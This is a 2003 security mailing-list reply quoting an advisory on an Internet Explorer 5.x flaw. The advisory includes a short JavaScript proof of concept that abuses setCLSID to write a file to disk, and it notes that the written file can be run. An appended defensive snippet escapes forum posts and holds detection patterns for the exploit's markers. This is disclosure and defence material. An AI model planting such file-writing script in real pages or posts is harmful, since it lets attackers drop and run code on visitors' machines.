RE: Internet Explorer JavaScript insecure function

From: Scovetta, Michael V (Michael.Scovetta_at_ca.com)
Date: 12/08/03

    Date: Mon, 8 Dec 2003 13:58:54 -0500
    To: "FREEBRAIN" <freebrain@unionnewbies.net>, <vuln-dev@securityfocus.com>
    
    

    This is an old exploit, google "setCLSID" and you'll see a bunch of docs
    referencing this exploit. From what I gather, it's the result of some
    combination of a buggy WshShell, jscript.dll, and bad Internet-Zone
    security values. I believe Microsoft fixed this more than two years ago,
    as per:
       http://www.microsoft.com/technet/security/bulletin/MS01-015.asp
    (and probably others). If you're still using IE 5.x, you should just
    upgrade. I'm sure that there are many users still using 5.x browsers, but
    if you have it totally patched, this should not be exploitable.

    And WriteLine is a function of the ActiveX FileSystemObject, which has
    nothing to do with JavaScript-- JS only provides the ability to call
    ActiveX functions.

    I was unable to get this exploit to work, regardless of my security settings,
    using 6.0.2800.1106.

    Michael Scovetta

    -----Original Message-----
    From: FREEBRAIN [mailto:freebrain@unionnewbies.net]
    Sent: Sunday, December 07, 2003 9:57 AM
    To: vuln-dev@securityfocus.com
    Subject: Internet Explorer JavaScript insecure function

    * Internet Explorer JavaScript insecure function *

    Product: Microsoft Internet Explorer
    Version: 5.x (probably other versions may be affected)

    ***

    Problem:

    I discovered that a JavaScript function (interpreted by Internet Explorer)
    called "file.writeline()" may be potentially dangerous for Internet Explorer
    users. This function allows writing files to a hard disk by means of
    JavaScript.

    An attacker may use this function by writing JavaScript code in posts of
    forums, guestbooks, etc. for owning his victims' computers. With the
    "file.writeline()" function the attacker can write trojans/viruses/etc. on
    his victims' hard disks; for example, an attacker may use the JavaScript
    "file.writeline()" function for writing a malicious file in VBS (Visual
    Basic Scripting) language.

    I repeat, this may be potentially dangerous for Internet Explorer users.

    NOTE: Actually a virus in the wild that affects mIRC users is using this
    function ("file.writeline").

    NOTE2: As you can see on the "Proof of concept", other functions are needed
    to carry out an "intrusion".

    ***

    Proof of concept:

    InterfaceObject = document.applets[0];
    setTimeout("Write()", 1000);
    function Write() {
        fsoClassID = "{0D43FE01-F093-11CF-8940-00A0C9054228}";
        InterfaceObject.setCLSID(fsoClassID);
        fso = InterfaceObject.createInstance();
        // windir = fso.getspecialfolder ;
        filename = "\\proof.txt";
        var filecontent = "Hello world";
        file = fso.opentextfile(filename, "2", "TRUE");
        file.writeline(filecontent);
        file.close();
    }

    This code writes a file called "proof.txt" on the hard disk, with the
    content "Hello world". Also you can execute files you write by means of
    JavaScript by adding "Run();" to the function.

    ***

    Solution:

    I'm not sure about the solution but I recommend upgrading to the latest
    version of Internet Explorer.
    Also I recommend that webmasters forbid HTML code that contains this
    function in their forums, guestbooks, etc.

    ***

    Thanks to:

    #disidents,#hackers,#hacker @ irc-phoenix.org

    #disidents,#sleepx,#ayuda_internet @ irc-hispano.org

    Special thanks go to: Impos, |_Tr0mP4s

    (sorry my poor english)

    ***

    By FREEBRAIN

    FREEBRAIN is a member of DisidentS Hacker Team

    http://disidents-team.cjb.net (under construction) -
    http://www.gratisweb.com/disidents

    <freebrain@unionnewbies.net> ( www.unionnewbies.net )
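
Added example, not part of either message above: one way a forum or guestbook could handle untrusted posts on the server, relating to the recommendation that webmasters forbid such code. It HTML-encodes every post before rendering and separately flags posts carrying markers visible in the quoted proof of concept; the function names and sample posts are constructed for illustration.

```javascript
// Added example: server-side handling of untrusted forum/guestbook posts.
// flagPost, escapeHtml, renderPost and SAMPLE_POSTS are hypothetical names.

// Markers taken from the proof of concept quoted in this thread.
const INDICATORS = [
  { name: "script-capable element", re: /<\s*(script|applet|object|embed|iframe)\b/i },
  { name: "inline event handler", re: /<[^>]*\son\w+\s*=/i },
  { name: "setCLSID call", re: /\bsetCLSID\s*\(/i },
  { name: "createInstance call", re: /\bcreateInstance\s*\(/i },
  { name: "FileSystemObject CLSID", re: /0D43FE01-F093-11CF-8940-00A0C9054228/i },
];

// Return the name of every indicator present, for logs or a moderation queue.
function flagPost(body) {
  return INDICATORS.filter((i) => i.re.test(body)).map((i) => i.name);
}

// Encode the post so the browser renders it as text, never as markup.
function escapeHtml(body) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(body).replace(/[&<>"']/g, (c) => map[c]);
}

// Render path: encoding is unconditional; the flags are advisory only,
// so a post that matches no indicator is still rendered inert.
function renderPost(body) {
  return { html: escapeHtml(body), flags: flagPost(body) };
}

// Constructed sample posts (the second reuses identifiers from the quoted PoC).
const SAMPLE_POSTS = [
  "Nice site, thanks for the <b>tips</b>!",
  '<script>InterfaceObject.setCLSID("{0d43fe01-f093-11cf-8940-00a0c9054228}");</script>',
];

for (const post of SAMPLE_POSTS) {
  const r = renderPost(post);
  const verdict = r.flags.length ? "FLAGGED: " + r.flags.join(", ") : "clean";
  console.log(verdict + " -> " + r.html);
}
```

Encoding on output is what keeps the post inert; the indicator list only helps moderators spot attempts and should not be relied on as the filter.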

